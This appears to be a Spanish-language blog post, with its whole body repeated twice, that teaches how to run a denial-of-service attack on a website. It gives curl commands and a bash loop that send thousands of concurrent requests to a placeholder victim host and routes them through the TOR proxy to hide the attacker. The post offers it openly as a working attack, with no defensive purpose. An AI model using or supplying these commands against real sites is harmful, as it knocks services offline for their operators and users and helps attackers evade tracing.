Es posible realizar un ataque DOS (sin necesidad de que sea distribuído, sin herramientas especiales y con una conexión común), valiéndonos solamente de CURL para realizar miles de peticiones simultáneas y TOR para ocultar nuestro rastro. Basicamente un ataque a la capa de aplicación.
¿Cómo? con curl, realizando múltiples peticiones por segundo y concurrentes, atacando al servidor web, aunque por lo general lo que termina consumiendo toda la memoria de la víctima es la base de datos que la web utiliza.
Un ejemplo simple sería el siguiente:
Enviamos 1000 peticiones con Curl:
curl -s "http://victima.com/algo.php?[1-1000]"
Si queremos que éstas peticiones sean a su vez concurrentes, entonces deberíamos poner en segundo plano cada llamada a curl tantas veces como concurrencias se necesiten.
Ejemplo:
curl -s "http://victima.com/algo.php?[1-1000]" &
pidlist="$pidlist $!"
curl -s "http://victima.com/algo.php?[1-1000]" &
pidlist="$pidlist $!"
curl -s "http://victima.com/algo.php?[1-1000]" &
pidlist="$pidlist $!"
O bien podemos automatizarlo con un FOR en bashscript: en este caso realizamos 1000 peticiones con 500 peticiones concurrentes.
for i in `seq 1 500`; do
curl -s http://victima.com/algo.php?[1-1000] & pidlist="$pidlist $!"
done
Por otro lado, utilizamos TOR para ocultar nuestro rastro, aunque ésto hace menos efectivo el ataque.
La forma de hacder una petición con curl a travez del proxy de TOR es la siguiente:
curl --socks5-hostname 127.0.0.1:9150 http//victima.com
Por lo tanto si queremos hacer múltiples peticiones (utilizando el primer ejemplo de curl) a travez del proxy de TOR, sería algo como lo siguiente:
curl -s --socks5-hostname 192.168.0.1:9150 "http://victima.com/algo.php?[1-1000]"
¿Dudas o sugerencias?
¿Cómo? con curl, realizando múltiples peticiones por segundo y concurrentes, atacando al servidor web, aunque por lo general lo que termina consumiendo toda la memoria de la víctima es la base de datos que la web utiliza.
Un ejemplo simple sería el siguiente:
Enviamos 1000 peticiones con Curl:
curl -s "http://victima.com/algo.php?[1-1000]"
Si queremos que éstas peticiones sean a su vez concurrentes, entonces deberíamos poner en segundo plano cada llamada a curl tantas veces como concurrencias se necesiten.
Ejemplo:
curl -s "http://victima.com/algo.php?[1-1000]" &
pidlist="$pidlist $!"
curl -s "http://victima.com/algo.php?[1-1000]" &
pidlist="$pidlist $!"
curl -s "http://victima.com/algo.php?[1-1000]" &
pidlist="$pidlist $!"
O bien podemos automatizarlo con un FOR en bashscript: en este caso realizamos 1000 peticiones con 500 peticiones concurrentes.
for i in `seq 1 500`; do
curl -s http://victima.com/algo.php?[1-1000] & pidlist="$pidlist $!"
done
Por otro lado, utilizamos TOR para ocultar nuestro rastro, aunque ésto hace menos efectivo el ataque.
La forma de hacder una petición con curl a travez del proxy de TOR es la siguiente:
curl --socks5-hostname 127.0.0.1:9150 http//victima.com
Por lo tanto si queremos hacer múltiples peticiones (utilizando el primer ejemplo de curl) a travez del proxy de TOR, sería algo como lo siguiente:
curl -s --socks5-hostname 192.168.0.1:9150 "http://victima.com/algo.php?[1-1000]"
¿Dudas o sugerencias?
Comentarios
Publicar un comentario